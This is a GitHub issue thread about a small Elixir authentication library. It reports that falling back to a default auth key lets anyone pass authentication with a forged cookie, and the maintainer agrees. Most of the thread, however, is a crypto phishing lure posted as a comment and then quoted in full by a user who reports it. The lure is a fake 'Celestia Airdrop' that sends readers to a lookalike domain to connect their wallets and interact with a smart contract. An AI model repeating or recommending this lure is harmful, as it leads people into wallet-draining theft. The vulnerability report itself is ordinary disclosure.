### ISSUE TITLE
Possible vulnerability when checking auth key.

### ISSUE THREAD

**Issue by smnkrt** [siepet/gandalf#3]
Assuming `Application.get_env(:gandalf, :auth_key)` and `opts[:auth_key]` are set to falsey statements it would be possible to pass the authentication by fabricating a cookie with `auth_key ==  "auth_key"`

https://github.com/siepet/gandalf/blob/2a76f23d7b45b1eda88151a225f52e31cbf09fb7/lib/gandalf.ex#L44

If security is the priority then maybe blocking all connections might be a good sollution if `auth_key` is not set.

**Comment by siepet** [comment]
Yes, you're correct. Setting up a default auth key is wrong way to do this.

You can make a Pull Request to avoid using default values 👍

**Comment by RojinMajd** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://www.celestianetworkl.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!Matthewjarredondo, @AidenLooo, @sbondada, @superestos, @zhaoshenglong, @ralintuscano, @erain, @ravi-ojha, @BenMorganIO, @rongzhg, @wxy325, @akiratetsuo, @NgKhacTho, @simplybychris, @tianzhipeng-git, @palhotel, @leoliew, @Annel702, @izontm, @paulblei

**Comment by BenMorganIO** [comment]
@RojinMajd

> # Celestia Airdrop - Claim Your Free TIA Tokens Now!
> [![Celestia Banner](https://camo.githubusercontent.com/ec6e2c5f04e9a8ffb3564b1f09cc044f0908d7464eba3cf56a07d713447ab51e/68747470733a2f2f6d69726f2e6d656469756d2e636f6d2f76322f726573697a653a6669743a313430302f312a4f306c6131676657784648545166315a4f6f54395f512e706e67)](https://www.celestianetworkl.online/)
> 
> **Don't Miss Out on Your Share of 60 Million $TIA Tokens!** Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.
> 
> _How to Claim Your Free TIA Tokens:_* It's easy to get started and claim your free TIA tokens. Follow these simple steps:
> 
> 1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://www.celestianetworkl.online/) and connect your wallet.
> 2. **Claim:** Click the Claim button to receive your tokens.
> 3. **Interact:** Engage with the provided smart contract to earn additional rewards.
> 
> **Why Wait? Start Earning Today!** With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!Matthewjarredondo, @AidenLooo, @sbondada, @superestos, @zhaoshenglong, @ralintuscano, @erain, @ravi-ojha, @BenMorganIO, @rongzhg, @wxy325, @akiratetsuo, @NgKhacTho, @simplybychris, @tianzhipeng-git, @palhotel, @leoliew, @Annel702, @izontm, @paulblei

Reporting...
